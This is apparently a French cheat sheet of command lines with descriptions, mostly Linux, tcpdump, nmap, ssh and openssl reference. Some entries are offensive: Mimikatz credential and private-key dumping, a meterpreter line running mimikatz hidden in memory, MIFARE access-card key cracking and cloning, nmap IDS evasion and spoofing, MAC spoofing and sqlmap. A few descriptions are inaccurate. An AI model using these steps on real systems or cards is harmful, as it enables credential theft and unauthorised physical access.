nslookup | Permet d'interroger un serveur de noms afin d'obtenir les informations concernant un domaine ou un hôte et permet ainsi de diagnostiquer les éventuels problèmes de configuration du DNS | nslookup | Linux OS |
2 = write (w) | Le 1er chiffre est l'autorisation du propriétaire, le 2ème au groupe et le 3ème à tout le monde | chmod | gestion des permissions |
$HOME | Annuaire personnel | Linux standard | Linux OS |
$PATH | Chemin de recherche exécutable | Linux standard | Linux OS |
$SHELL | shell actuelle | Linux standard | Linux OS |
(tcpdump option) -e | En-têtes Print Link (Ethernet) (option d'affichage) | tcpdump | capture de paquets |
(tcpdump option) -q | Le mode assez et moins verbeux affiche moins de détails (option d'affichage) | tcpdump | capture de paquets |
(tcpdump option) -S | Imprimer les numéros de séquence au format exact (option d'affichage) | tcpdump | capture de paquets |
(tcpdump option) -t | Ne pas imprimer les détails de l'horodatage dans le vidage (option d'affichage) | tcpdump | capture de paquets |
(tcpdump option) -v | Peu de sortie verbeuse (option d'affichage) | tcpdump | capture de paquets |
(tcpdump option) -x | Imprimer les données et les en-têtes au format HEX (option d'affichage) | tcpdump | capture de paquets |
(tcpdump option) -X | Sortie d'impression au format HEX et ASCII à l' exclusion des en -têtes de lien (option d'affichage) | tcpdump | capture de paquets |
(tcpdump option) -xx | Imprimer des données avec des en-têtes de lien au format HEX (option d'affichage) | tcpdump | capture de paquets |
(tcpdump option) -XX | Sortie d'impression au format HEX et ASCII, y compris les en -têtes de lien (option d'affichage) | tcpdump | capture de paquets |
(tcpdump option) -vv | Sortie plus verbeuse (option d'affichage) | tcpdump | capture de paquets |
(tcpdump option) -vvv | Sortie la plus verbeuse (option d'affichage) | tcpdump | capture de paquets |
1 = execute (x) | Le 1er chiffre est l'autorisation du propriétaire, le 2ème au groupe et le 3ème à tout le monde | chmod | gestion des permissions |
4 = read (r) | Le 1er chiffre est l'autorisation du propriétaire, le 2ème au groupe et le 3ème à tout le monde | chmod | gestion des permissions |
cat file1 file2 | Concaténer les fichiers et la sortie | cat | gestion dossiers et fichiers |
cd dossier02 | Changer de répertoire vers dossier02 | cd | gestion dossiers et fichiers |
cd.. | Remonter l'arborescence | cd | gestion dossiers et fichiers |
chmod 775 file | Changer le mode du fichier en 775 | chmod | gestion des permissions |
chmod -R 600 folder | Dossier chmod récursivement à 600 | chmod | gestion des permissions |
chown user:group file | Changer le propriétaire du fichier en utilisateur et le groupe en groupe | chmod | gestion des permissions |
cmd & | Exécutez cmd dans un sous-shell | Linux standard | Exécution de cmd |
cmd &> file | Chaque sortie de cmd dans un fichier | Linux standard | Redirection E/S |
cmd < file | Entrée de cmd à partir du fichier | Linux standard | Redirection E/S |
cmd > /dev/null | Supprimer la sortie standard de cmd | Linux standard | Redirection E/S |
cmd > file | Sortie standard (stdout) de cmd dans un fichier | Linux standard | Redirection E/S |
cmd >> file | Ajouter stdout au fichier | Linux standard | Redirection E/S |
cmd 1>&2 | stdout au même endroit que stderr | Linux standard | Redirection E/S |
cmd 2> file | Sortie d'erreur (stderr) de cmd dans le fichier | Linux standard | Redirection E/S |
cmd 2>&1 | stderr au même endroit que stdout | Linux standard | Redirection E/S |
cmd1 | cmd2 | stdout de cmd1 à cmd2 avec la pipe | Linux standard | Redirection E/S |
cmd1 && cmd2 | Exécutez cmd2 si cmd1 réussit | Linux standard | Exécution de cmd |
cmd1 ; cmd2 | Exécutez cmd1 puis cmd2 | Linux standard | Exécution de cmd |
cmd1 |& cmd2 | stderr de cmd1 à cmd2 avec la pipe | Linux standard | Redirection E/S |
cmd1 || cmd2 | Exécutez cmd2 si cmd1 ne réussit pas | Linux standard | Exécution de cmd |
cmd1 <(cmd2) | Sortie de cmd2 en tant qu'entrée de fichier dans cmd1 | Linux standard | Redirection E/S |
copié-collé le contenu de la clé publique | Etape B4 (méthode 1) - Puis on colle dans le fichier "authorized_keys" le contenu de notre clé publique précédemment copié depuis ~/.ssh/id_rsa.pub qui était sur la machine cliente. | ssh | Générer une paire de clé RSA |
cp file1 file2 | Copier le fichier1 dans le fichier2 | cp | gestion dossiers et fichiers |
crypto | interagit avec les modules cryptographiques de Windows CryptoAPI [CAPI]et CNG [CNG], ainsi que l’extraction de certificats et de clés. | Mimikatz | Exploitation vulnérabilités |
crypto::exportCertificates < MagasinSystème> | Etape E - Enfin, il nous suffit d'exécuter la commande suivante pour récupérer le certificat et la clé privée associée | Mimikatz | Exploitation vulnérabilités |
crypto::listCertificates | Etape B - lister les certificats disponibles | Mimikatz | Exploitation vulnérabilités |
crypto::listStores | Etape A - La première étape consiste à rechercher, dans les magasins de la machine, l’endroit où est stocké le certificat. Dans notre cas, le certificat étant associé à un utilisateur, nous listons les magasins de l'utilisateur courant (CERT_SYSTEM_STORE_CURRENT_USER) via la commande suivante | Mimikatz | Exploitation vulnérabilités |
crypto::patchcapi | Etape C - Afin d'exporter la clé privée du certificat mathieu.mauger, nous patchons le mécanisme de sécurité CryptoAPI à l'aide de la fonction patchapi | Mimikatz | Exploitation vulnérabilités |
crypto::patchcng | Etape D - Si la clé avait été protégée par la CNG, nous aurions dû patcher LSASS avant d’exporter via | Mimikatz | Exploitation vulnérabilités |
ctrl-O | nano - Enregistrer le fichier | nano | gestion dossiers et fichiers |
ctrl-R | nano - Lire le fichier | nano | gestion dossiers et fichiers |
ctrl-X | nano - fermer le fichier | nano | gestion dossiers et fichiers |
date | Afficher la date du système | Linux standard | Linux OS |
divers | contient diverses fonctions majoritairement expérimentales. | Mimikatz | Exploitation vulnérabilités |
echo $NAME | Valeur de sortie de la variable $ NAME | Linux standard | Linux OS |
env | Afficher les variables d'environnement | Linux standard | Linux OS |
ether src/ dst host (ethernet host name or IP) | Filtrage d'hôte Ethernet par source ou destination | tcpdump | capture de paquets |
ether/ip broadcast | Filtre pour les diffusions Ethernet ou IP | tcpdump | capture de paquets |
ether/ip multicast | Filtre pour les multidiffusions Ethernet ou IP | tcpdump | capture de paquets |
export NAME=value | Définir $ NAME sur la valeur | Linux standard | Linux OS |
file file1 | Obtenir le type de fichier1 | Linux standard | gestion dossiers et fichiers |
find /root/ -name photo* | Trouver les fichiers commençant par photo | find | gestion dossiers et fichiers |
find /root/ -user toto | Trouver les fichiers détenus par utilisateur toto | find | gestion dossiers et fichiers |
find /root/ -mmin 10 | Trouver les fichiers modifier il y'a moins de 10 minutes | find | gestion dossiers et fichiers |
grep " open " results.nmap | sed -r 's/ +/ /g' | sort | uniq -c | sort -rn | less | Liste triée inversée de la fréquence à laquelle les ports apparaissent | nmap | Commande spéciale |
grep -i | Recherche insensible à la casse | grep | gestion dossiers et fichiers |
grep -o | Afficher uniquement la partie correspondante du fichier | grep | gestion dossiers et fichiers |
grep -r | Recherche récursive | grep | gestion dossiers et fichiers |
grep toto fichier01.txt | Rechercher "toto" dans les fichier01.txt | grep | gestion dossiers et fichiers |
grep -v | Recherche inversée | grep | gestion dossiers et fichiers |
head -n1 /etc/issue | Afficher la distribution | Linux standard | Linux OS |
head file1 | Afficher les 10 premières lignes du fichier1 | head | gestion dossiers et fichiers |
inject | injection de bibliothèques dans des processus Windows. | Mimikatz | Exploitation vulnérabilités |
kelloworld (bibliothèque) | est une bibliothèque servant d’exemple pour l’injection | Mimikatz | Exploitation vulnérabilités |
kill pid | Tuer le processus avec id pid | kill | Gestion des processus |
killall name | Tuez tous les processus avec des noms commençant par le nom indiquer | kill | Gestion des processus |
klock (bibliothèque) | permet la manipulation de bureaux. | Mimikatz | Exploitation vulnérabilités |
L' UID c'est quoi ? | UID - Identifiant unique d'une puce nfc (ex: ea b5 8f 4b) | informations nfc | NFC /Rfid |
La cle privée c'est quoi? | une clé dite « privée » qui sert à déchiffrer. (id_rsa) | ssh | Générer une paire de clé RSA |
La clé publique c'est quoi? | une clé dite « publique » qui sert à chiffrer (id_rsa.pub) | ssh | Générer une paire de clé RSA |
Le block 0 c'est quoi ? | Le "block 0" c'est là qu'est écrit le numéro de série de la puce (UID) | informations nfc | NFC /Rfid |
Les clés A et B c'est quoi ? | Ce sont les 2 clés qui protèges les block secteur de la puce NFC | informations nfc | NFC /Rfid |
less file1 | Afficher et paginer le fichier1 | less | gestion dossiers et fichiers |
locate file | Rechercher un fichier (recherche rapide de l'index système) | locate | gestion dossiers et fichiers |
ls | lister des dossiers et fichiers | ls | gestion dossiers et fichiers |
ls -a | Tout afficher (y compris masqué) | ls | gestion dossiers et fichiers |
ls -I | Format de liste longue | ls | gestion dossiers et fichiers |
ls -l | Lister un fichier par ligne | ls | gestion dossiers et fichiers |
ls -m | Sortie séparée par des virgules | ls | gestion dossiers et fichiers |
ls -Q | Sortie citée | ls | gestion dossiers et fichiers |
ls -R | Liste récursive | ls | gestion dossiers et fichiers |
ls -r | Lister par Ordre inverse | ls | gestion dossiers et fichiers |
ls -S | Trier par taille de fichier | ls | gestion dossiers et fichiers |
ls -t | Trier par taille de fichier | ls | gestion dossiers et fichiers |
macchanger -m 23:05:13:37:42:21 eth0 | Changer l'adresses MAC de mon interface eth0 | macchanger | Usurpation d'adresse MAC |
man nom_du_soft | Afficher le manuel de la commande | Linux standard | Linux OS |
meterpreter > execute -H -i -c -m -d calc.exe -f mimikatz.exe -a é"sekurlsa::logonPasswords full" exite' | * H : crée un processus caché.
* i : interagit avec le processus une fois ce dernier créé.
* c : déporte la sortie standard de l’exécutable sur le shell meterpreter.
* d : indique le nom du processus à utiliser et qui apparaîtra ainsi dans le gestionnaire des tâches.
* m : exécute le programme depuis la mémoire.
* f : signale l’exécutable.
* a : signale les arguments. Il est à noter l'utilisation de guillemets pour les arguments de Mimikatz.B23 | Mimikatz + meterpreter | Commande spéciale |
mfcuk -C -R 0:A | Extraction de la clé A sur le block 0 ( -C = initialise la connection au lecteur) | mfcuk | NFC /Rfid |
mfoc -P 500 -O carte-acces.dmp | Création dump de la puce carte d'accès (originale) | mfoc | NFC /Rfid |
mfoc -O mifare_dump.mfd -k xxxxxxxxxxxx | utiliser la clef trouvé (xxxxxx ) pour retrouver toutes les autres clefs | mfoc | NFC /Rfid |
mfoc -P 500 -O puce-originale.dmp | Etape A - Extraction des infos + block0 (uid) + clés défaut (a+b) de puce original | mfoc | NFC /Rfid |
mfoc -P 500 -O puce-vierge.dmp | Etape B - Extraction des infos + block0 (uid) + clés défaut (a+b) de puce original | mfoc | NFC /Rfid |
mimikatz.sys (pilote) | Enfin, un pilote mimikatz.sys est également fourni et permet ainsi d’avoir un point d’entrée en mode utilisateur dans le noyau | Mimikatz | Exploitation vulnérabilités |
minesweeper | module de démonstration permettant de manipuler le démineur de Windows XP et 7. | Mimikatz | Exploitation vulnérabilités |
mkdir .ssh | Etape B2 (méthode 1) - Puis créer s’il n’existe pas, le répertoire .ssh à la racine du répertoire utilisateur du serveur distant | ssh | Générer une paire de clé RSA |
mkdir dossier01 | Créer un répertoire dossier01 | mkdir | gestion dossiers et fichiers |
mount | Afficher les systèmes de fichiers montés | Linux standard | Linux OS |
mv file1 file2 | Déplacer le fichier1 vers le fichier2 | mv | gestion dossiers et fichiers |
nano /.ssh/authorized_keys | Etape B3 (méthode 1) - Puis créer s’il n’existe pas, le fichier "authorized_keys", ou seront copiés les clés publiques autorisées à se connecter. | ssh | Générer une paire de clé RSA |
nano fichier.txt | nano - crée le fichier.txt | nano | gestion dossiers et fichiers |
ncat 192.168.1.10 1337 | Connection à l'hote 192.168.1.10 sur le port TCP 1337 | ncat | Outils de connection |
ncat -l -p 1337 | Écouter sur le port TCP 1337 | ncat | Outils de connection |
ncat --ssl 10.5.23.42 1337 | Connectez-vous au service TLS | ncat | Certificats TLS - SSL |
ncat --ssl -l -p 1337 --ssl-cert cert.pem --ssl-key key.pem | Démarrez le serveur TLS | ncat | Certificats TLS - SSL |
ndiff scanl.xml scan2.xml | Comparez la sortie de nmap en utilisant le ndif | nmap | Commande spéciale |
nfc-list | Lecture simple d'une puce nfc | nfc-list | NFC /Rfid |
nfc-list -v | Lecture avancée d'une puce nfc | nfc-list | NFC /Rfid |
nfc-mfclassic r a u carte-original-avec-clés-a-b-par-défaut.bin | Dumper le contenu de la carte vers le fichier ,bin en utilisant des clefs a et b par défaut | nfc-mfclassic | NFC /Rfid |
nfc-mfclassic W a carte-acces.dmp carte-vierge.dmp | Ecriture avec (block 0) de carte-accès.dmp sur une carte vierge | nfc-mfclassic | NFC /Rfid |
nfc-mfclassic W a puce-originale.dmp puce-vierge.dmp | Etape C - Copie avec block0 de puce-originale vers puce-vierge | nfc-mfclassic | NFC /Rfid |
nfc-scan-device | Lister les lecteurs disponibles | nfc-scan | NFC /Rfid |
nmap 192.168.1.0/24 | Numériser en utilisant la notation CIDR | nmap | Scanner de reseaux |
nmap 192.168.1.1 | Scanner une seule IP | nmap | Scanner de reseaux |
nmap 192.168.1.1 192.168.2.1 | Analyser des adresses IP spécifiques | nmap | Scanner de reseaux |
nmap 192.168.1.1 -A | Permet la détection du système d'exploitation, la détection de version,l'analyse de script et le traceroute | nmap | Detection OS |
nmap 192.168.1.1 -d | Augmentez le niveau de débogage (utilisez -dd ou plus pour un meilleur effet) | nmap | Sortie des résultats d'analyses |
nmap 192.168.1.1 -F | Analyse rapide des ports (100 ports) | nmap | Scan d'hote |
nmap 192.168.1.1 -f | L'analyse demandée (y compris les analyses ping) utilise de minuscules paquets IP fragmentés. Plus difficile pour les filtres de paquets | nmap | Usurpation de pare-feu / IDS |
nmap 192.168.1.1 --mtu 32 | Définissez votre propre taille de MTU | nmap | Usurpation de pare-feu / IDS |
nmap 192.168.1.1 -n | Ne jamais faire de résolution DNS pendant le scan | nmap | Scan d'hote |
nmap 192.168.1.1 -O | Détection du système d'exploitation à distance à l'aide de l'empreinte de la pile TCP / IP | nmap | Detection OS |
nmap 192.168.1.1 -oA results | Sortie dans les trois principaux formats à la fois | nmap | Sortie des résultats d'analyses |
nmap 192.168.1.1 -oG grep.file | Sortie "Grepable" dans le fichier grep.file | nmap | Sortie des résultats d'analyses |
nmap 192.168.1.1 -oN normal.file | Sortie normale dans le fichier normal.file | nmap | Sortie des résultats d'analyses |
nmap 192.168.1.1 --open | Afficher uniquement les ports ouverts (ou éventuellement ouverts) | nmap | Sortie des résultats d'analyses |
nmap 192.168.1.1 -oX xml.file | Sortie XML dans le fichier xml.file | nmap | Sortie des résultats d'analyses |
nmap 192.168.1.1 -p 21 | Scan un seul port | nmap | Scan d'hote |
nmap 192.168.1.1 -p 21-100 | Scan une plage de ports | nmap | Scan d'hote |
nmap 192.168.1.1 -p http,https | Analyse des ports à partir du nom du service | nmap | Scan d'hote |
nmap 192.168.1.1 -p U: 53, T: 21-25,80 | Analyse des ports spécifiques en TCP et UDP | nmap | Scan d'hote |
nmap 192.168.1.1 -p0- | Balayage de tous les ports | nmap | Scan d'hote |
nmap 192.168.1.1 --reason | Afficher la raison pour laquelle un port est dans un état particulier, même sortie que -vv | nmap | Sortie des résultats d'analyses |
nmap 192.168.1.1 -sA | Analyse du port TCP ACK | nmap | Technique de scan |
nmap 192.168.1.1 -sC | Analyser avec les scripts NSE par défaut. Considéré comme utile pour la découverte et sûr | nmap | Scripts NSE |
nmap 192.168.1.1 --script "not intrusive" | Analyser les paramètres par défaut, mais supprimer les scripts intrusifs | nmap | Scripts NSE |
nmap 192.168.1.1 --script default | Analyser avec les scripts NSE par défaut. Considéré comme utile pour la découverte et sûr | nmap | Scripts NSE |
nmap 192.168.1.1 --script=banner | Numérisez avec un seul script. Exemple de bannière | nmap | Scripts NSE |
nmap 192.168.1.1 --script=http* | Numérisez avec un caractère générique. Exemple http | nmap | Scripts NSE |
nmap 192.168.1.1 --script=http,banner | Scannez avec deux scripts. Exemple http et bannière | nmap | Scripts NSE |
nmap 192.168.1.1 -sM | Analyse des ports TCP Maimon | nmap | Technique de scan |
nmap 192.168.1.1 -sS | Analyse des ports TCP SYN (par défaut) | nmap | Technique de scan |
nmap 192.168.1.1 -sT | Analyse du port de connexion TCP | nmap | Technique de scan |
nmap 192.168.1.1 -sU | Analyse des ports UDP | nmap | Technique de scan |
nmap 192.168.1.1 -sV | Tente de déterminer la version du service en cours d'exécution sur le port | nmap | Detection des services et versions |
nmap 192.168.1.1 -sV --version-intensity 8 | Niveau d'intensité 0 à 9. Attention ! Un nombre plus élevé augmente les faux positifs. | nmap | Detection des services et versions |
nmap 192.168.1.1 -sW | Analyse des ports de la fenêtre TCP | nmap | Technique de scan |
nmap 192.168.1.1 -T0 | Paranoid (0) (analyse lente) Détection d' intrusion évasion système | nmap | Vitesse de scan |
nmap 192.168.1.1 -T1 | Sneaky (1) Système de détection d' intrusion évasion | nmap | Vitesse de scan |
nmap 192.168.1.1 -T2 | Polite (2) ralentit l'analyse pour utiliser moins de bande passante et utiliser moins de ressources de la machine cible | nmap | Vitesse de scan |
nmap 192.168.1.1 -T3 | Normal (3) qui est la vitesse par défaut | nmap | Vitesse de scan |
nmap 192.168.1.1 -T4 | Les balayages agressifs (4) accélèrent; suppose que vous êtes sur un réseau raisonnablement rapide et fiable | nmap | Vitesse de scan |
nmap 192.168.1.1 -T4 --packet-trace | Afficher tous les paquets envoyés et reçus | nmap | Sortie des résultats d'analyses |
nmap 192.168.1.1 -T5 | Balayage de vitesses folles (5); suppose que vous êtes sur un réseau extrêmement rapide | nmap | Vitesse de scan |
nmap 192.168.1.1 -v | Augmentez le niveau de verbosité (utilisez -vv ou plus pour un meilleur effet) | nmap | Sortie des résultats d'analyses |
nmap 192.168.1.1/24 -sn | Désactivez l'analyse des ports. Découverte d'hôte uniquement. | nmap | Scan d'hote |
nmap 192.168.1.1-1/24 -PR -sn -vv | Découverte Arp uniquement sur le réseau local, pas de scan de port | nmap | Commande spéciale |
nmap 192.168.1.1-254 | Scanner une plage d'IP | nmap | Scanner de reseaux |
nmap 192.168.1.1-3 -sL | Pas de scan. Lister les cibles uniquement | nmap | Scan d'hote |
nmap 192.168.1.1-5 -Pn | Désactivez la découverte d'hôte. Analyse des ports uniquement. | nmap | Scan d'hote |
nmap 192.168.1.1-50 -sL --dns-server 192.168.1.1 | Interrogez le DNS interne pour les hôtes, répertoriez uniquement les cibles | nmap | Commande spéciale |
nmap -6 2607: f0d0: 1002: 51 :: 4 | Scanner adresse IPv6 | nmap | Scanner de reseaux |
nmap -D 192.168.1.101,192.168.1.102,192.168.1.103,192.168.1.23 192.168.1.1 | Envoyer des scans à partir d'adresses IP usurpées | nmap | Usurpation de pare-feu / IDS |
nmap -D decoy-ip1,decoy-ip2,your-own-ip,decoy-ip3,decoy-ip4 remote-host-ip | Envoyer des scans à partir d'adresses de leurre (a choisir) | nmap | Usurpation de pare-feu / IDS |
nmap --data-length 200 192.168.1.1 | Ajoute des données aléatoires aux paquets envoyés | nmap | Usurpation de pare-feu / IDS |
nmap --exclude 192.168.1.1 | Exclure les hôtes répertoriés | nmap | Scanner de reseaux |
nmap -f -t 0 -n -Pn - longueur des données 200 -D 192.168.1.101,192.168.1.102,192.168.1.103,192.168.1.23 192.168.1.1 | Exemple de commande IDS Evasion | nmap | Usurpation de pare-feu / IDS |
nmap -g 53 192.168.1.1 | Utiliser le numéro de port source donné | nmap | Usurpation de pare-feu / IDS |
nmap -h | écran d'aide nmap | nmap | Scanner de reseaux |
nmap --iflist | Affiche les interfaces et les itinéraires de l'hôte | nmap | Sortie des résultats d'analyses |
nmap -iL targets.txt | Analyser les cibles à partir d'un fichier | nmap | Scanner de reseaux |
nmap -iR 10 -n -oX out.xml | grep "Nmap" | cut -d " " -f5 > live-hosts.txt | Générer une liste des adresses IP des hôtes en direct | nmap | Commande spéciale |
nmap -iR 10 -sn -traceroute | Traceroute vers des cibles aléatoires, pas de scan de port | nmap | Commande spéciale |
nmap -iR 100 | Analyser 100 hôtes aléatoires | nmap | Scanner de reseaux |
nmap -n -Pn -p 80 --open -sV -vvv --script banner,http-title -iR 1000 | Recherche rapide de serveurs Web aléatoires | nmap | Scripts NSE |
nmap -n -Pn -vv -O -sV --script smb-enum*,smb-ls,smb-mbenum,smb-os-discovery,smb-s*,smb-vuln*,smbv2* -vv 192.168.1.1 | Safe SMB scripts to run | nmap | Scripts NSE |
nmap -p80 --script http-sql-injection scanme.nmap.org | Rechercher des injections SQL | nmap | Scripts NSE |
nmap -p80 --script http-unsafe-output-escaping scanme.nmap.org | Détecter les vulnérabilités des scripts intersites | nmap | Scripts NSE |
nmap -p80 -sV -oG - --open 192.168.1.1/24 | grep open | Rechercher les serveurs Web et grep pour afficher les adresses IP exécutant des serveurs Web | nmap | Commande spéciale |
nmap -Pn --script = http-sitemap-generator scanme.nmap.org | générateur de plan de site http | nmap | Scripts NSE |
nmap -Pn --script=dns-brute domain.com | Brute force les noms d'hôtes DNS à deviner les sous-domaines | nmap | Scripts NSE |
nmap --proxies http://192.168.1.1:8080, http://192.168.1.2:8080 192.168.1.1 | Connexions relais via des proxys HTTP / SOCKS4 | nmap | Usurpation de pare-feu / IDS |
nmap --resume results.file | Reprendre une analyse | nmap | Sortie des résultats d'analyses |
nmap -S www.microsoft.com www.facebook.com | Scanner Facebook à partir de Microsoft (-e eth0 -Pn peut être requis) | nmap | Usurpation de pare-feu / IDS |
nmap scanme.nmap.org | Analyser un domaine | nmap | Scanner de reseaux |
nmap --script snmp-sysdescr --script-args snmpcommunity=admin 192.168.1.1 | Script NSE avec arguments | nmap | Scripts NSE |
nmap --script whois* domain.com | Requête Whois | nmap | Scripts NSE |
nogpo | permet de contourner certaines GPO Windows triviales. | Mimikatz | Exploitation vulnérabilités |
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -nodes -subj "/CN=example.org/" | Créer un certificat auto-signé | openssl | Certificats TLS - SSL |
openssl s_client -connect 10.5.23.42:1337 | Connectez-vous au service TLS en utilisant openssl | openssl | Certificats TLS - SSL |
openssl s_client -connect 10.5.23.42:1337 | openssl x509 -text | Afficher les détails du certificat | openssl | Certificats TLS - SSL |
pkill name | Tuer le processus avec le nom du processus | kill | Gestion des processus |
privilege::debug | il est nécessaire de nous attribuer le privilège Debug si nous ne sommes pas déjà SYSTEM | Mimikatz | Exploitation vulnérabilités |
ps | Afficher un instantané des processus | ps | Gestion des processus |
pwd | Afficher le répertoire actuel | Linux standard | gestion dossiers et fichiers |
rm file1 | Supprimer le fichier1 | rm | gestion dossiers et fichiers |
rsync option (-a ) | mode archivage, permet de copier de manière récursive, de préserver les permissions et de ne pas suivre les liens symboliques | rsync | Synchonisation des données |
rsync option (--dry-run) | effectuer un essai sans modification | rsync | Synchonisation des données |
rsync option (-e ssh ) | permet d’utiliser ssh pour le transfert de données | rsync | Synchonisation des données |
rsync option (-v ) | verbose, affiche la liste des fichiers copiés | rsync | Synchonisation des données |
rsync option (-z ) | compress, permet de compresser les données avant de les transférer | rsync | Synchonisation des données |
rsync -ave ssh serveur_ip_ou_nom:/chemin/vers/source /chemin/vers/destination | Synchoniser source et destination d'un serveur à l'autre (méthode 2) | rsync + ssh | Synchonisation des données |
rsync chemin/vers/source chemin/vers/destination | Synchoniser source et destination depuis la même machine | rsync | Synchonisation des données |
rsync -e ssh -avz /chemin/vers/source serveur_ip_ou_nom:/chemin/vers/destination | Synchoniser source et destination d'un serveur à l'autre (méthode 1) | rsync + ssh | Synchonisation des données |
samdump | permet d’extraire les hashes de la base SAM de l’équipement Windows, via la base de registre ou des fichiers plats. | Mimikatz | Exploitation vulnérabilités |
sekurlsa | extrait les hashes et mots de passe des sessions Windows en cours. | Mimikatz | Exploitation vulnérabilités |
sekurlsa (bibliothèque) | fournit les mêmes fonctionnalités que le module éponyme. Il est préconisé de privilégier l’utilisation du module.Elle ne contient maintenant que les fonctionnalités devant s'exécuter dans le processus LSASS (processus gérant l'authentification des utilisateurs de l'équipement). | Mimikatz | Exploitation vulnérabilités |
sekurlsa::logonPasswords full | A voir | Mimikatz | Exploitation vulnérabilités |
socat TCP-LISTEN:2305,fork,reuseaddr ssl:example.com:443 | Proxy TCP vers TLS | openssl | Certificats TLS - SSL |
sqlmap -u "site:www.site-exemple.com inurl:produit.php" | Recherche d'erreurs SQL sur le "www.site-exemple.com" via le dorks "produit.php" | Sqlmap | Injection SQL |
src/ dsthost (host name or IP) | Filtrer par adresse IP ou hôte source ou de destination | tcpdump | capture de paquets |
src/ dstnet (subnet mask in CIDR) | Filtrer par sous-réseau | tcpdump | capture de paquets |
ssh user@mon_serveur | Etape B1 (méthode 1) - se connecter manuellement en ssh sur le serveur distant | ssh | Générer une paire de clé RSA |
ssh-add | Etape C - "L'agent ssh" retient les clés privées pendant toute la durée de votre session.Maintenant, a chaque fois que vous vous connecterez à ce serveur distant, vous n'aurez plus besoin d'entrer la passphrase | ssh | Générer une paire de clé RSA |
ssh-copy-id -i id_rsa.pub user@ip-serveur-distant | Etape B5 (méthode 2) - Envoyer la clé publique "id_rsa.pub" au serveur distant et à l'ajouter à son fichier "authorized_keys(clés autorisées)". Le serveur y garde une liste des clés qu'il autorise à se connecter. | ssh | Générer une paire de clé RSA |
ssh-keygen -p -t rsa | Etape E - Si vous souhaitez par la suite modifier le mot de passe de la clé, il faudra utiliser cette commande | ssh | Générer une paire de clé RSA |
ssh-keygen -t rsa | Etape A1 - créer une clé publique et clé privée sur sa machine cliente ( L’emplacement par défaut ou seront générés les clés /home/votre_user/.ssh/id_rsa ) | ssh | Générer une paire de clé RSA |
ssh-keygen -t rsa | Etape A2 - Indiquer le "nom du fichier de clé" /home/toto/.ssh/ id_rsa_rsync et le "pass" vide pour connexion auto de rsync | ssh | Générer une paire de clé RSA |
sslyze --regular 10.5.23.42:443 | Tester le certificat et les chiffrements du serveur TLS | openssl | Certificats TLS - SSL |
standard | intègre les commandes de base de l'outil | Mimikatz | Exploitation vulnérabilités |
sudo /etc/init.d/ssh restart | Etape D - Lors du simple ajout de clé, il est nécessaire de redémarrer le server openssh afin qu’il prenne en compte le nouveau client | ssh | Générer une paire de clé RSA |
system | intègre des commandes système de base telles que l’obtention de l’utilisateur et de l’ordinateur courant. | Mimikatz | Exploitation vulnérabilités |
tail -F file1 | Sortie des dernières lignes du fichier1 à mesure qu'il change | tail | gestion dossiers et fichiers |
tail file1 | Afficher les 10 dernières lignes du fichier1 | tail | gestion dossiers et fichiers |
tcp/udp src/dst port ( port number) | Filtrer les paquets TCP ou UDP par port source ou de destination | tcpdump | capture de paquets |
tcp/udp src/dst port range ( port number range) | Filtrer les paquets TCP ou UDP par plage de ports source ou de destination | tcpdump | capture de paquets |
tcpdump <32 | Affiche la taille des paquets inférieure à 32 | tcpdump | capture de paquets |
tcpdump >=32 | Affiche la taille des paquets supérieure à 32 | tcpdump | capture de paquets |
tcpdump -d tcpdump.pcap | afficher une forme lisible par l'homme dans la sortie standard | tcpdump | capture de paquets |
tcpdump dst 10.1.1.1 && !icmp | L'une ou l'autre des conditions peut correspondre | tcpdump | capture de paquets |
tcpdump dst 10.1.1.1 and not icmp | Négation de la condition | tcpdump | capture de paquets |
tcpdump dst 10.1.1.100 | Capturer à partir d'une adresse de destination spécifique | tcpdump | capture de paquets |
tcpdump ether host aa: bb: cc: 11: 22: 33 | "host" pour limiter la sortie à une adresse MAC spécifique | tcpdump | capture de paquets |
tcpdump ether port 80 | Capturer le trafic à partir d'un port défini uniquement | tcpdump | capture de paquets |
tcpdump -F tcpdump.pcap | Utilisez le fichier donné comme entrée pour le filtre | tcpdump | capture de paquets |
tcpdump host 192.168.1.100 | Capturer des paquets d'un hôte spécifique | tcpdump | capture de paquets |
tcpdump http | Filtrer le trafic en fonction d'un numéro de port pour un service | tcpdump | capture de paquets |
tcpdump -i any | Capture depuis toutes les interfaces | tcpdump | capture de paquets |
tcpdump -i eth0 | Capture depuis une interface spécifique | tcpdump | capture de paquets |
tcpdump -I eth0 | définir l'interface comme mode moniteur | tcpdump | capture de paquets |
tcpdump -i eth0 -c 10 | Capturez les 10 premiers paquets et quittez | tcpdump | capture de paquets |
tcpdump -i eth0 -w tcpdump.txt | Pour enregistrer la capture dans un fichier | tcpdump | capture de paquets |
tcpdump -K tcpdump.pcap | Ne pas vérifier la somme de contrôle | tcpdump | capture de paquets |
tcpdump -L | Afficher les types de liaison de données pour l'interface | tcpdump | capture de paquets |
tcpdump -n -I eth0 | Ne résolvez pas les noms d'hôte | tcpdump | capture de paquets |
tcpdump -N tcpdump.pcap | ne pas imprimer les noms de domaine | tcpdump | capture de paquets |
tcpdump -n src 192.168.1.1 and dst port 21 | Combiner les options de filtrage | tcpdump | capture de paquets |
tcpdump net 10.1.1.0/16 | Capturer des fichiers à partir du sous-réseau du réseau | tcpdump | capture de paquets |
tcpdump -p -i eth0 | Ne pas capturer en mode promiscuité | tcpdump | capture de paquets |
tcpdump port 80 | Filtrer le trafic en fonction d'un service | tcpdump | capture de paquets |
tcpdump portrange 21-125 | Filtre basé sur la plage de ports | tcpdump | capture de paquets |
tcpdump -r file_path_and_name | Lecture d'une capture | tcpdump | capture de paquets |
tcpdump -S http | Afficher le paquet entier | tcpdump | capture de paquets |
tcpdump src 10.1.1.100 | Capturer à partir d'une adresse source spécifique | tcpdump | capture de paquets |
tcpdump -D | Afficher les interfaces disponibles | tcpdump | capture de paquets |
tcpdump -i eth0 -A | Imprimer en ASCII | tcpdump | capture de paquets |
tcpdump -i eth0 -c 10 -w tcpdump.pcap tcp | Capturer uniquement les paquets TCP | tcpdump | capture de paquets |
tcpdump -i eth0 port 80 | Capturer le trafic à partir d'un port défini uniquement | tcpdump | capture de paquets |
tcpdump -n -i eth0 | Arrêter la traduction et les recherches de noms de domaine (noms d'hôte ou noms de port) | tcpdump | capture de paquets |
tcpdump -r tcpdump.txt | Lire et analyser le fichier de capture enregistré | tcpdump | capture de paquets |
tcpdunp -IPV6 | Afficher uniquement les paquets IPV6 | tcpdump | capture de paquets |
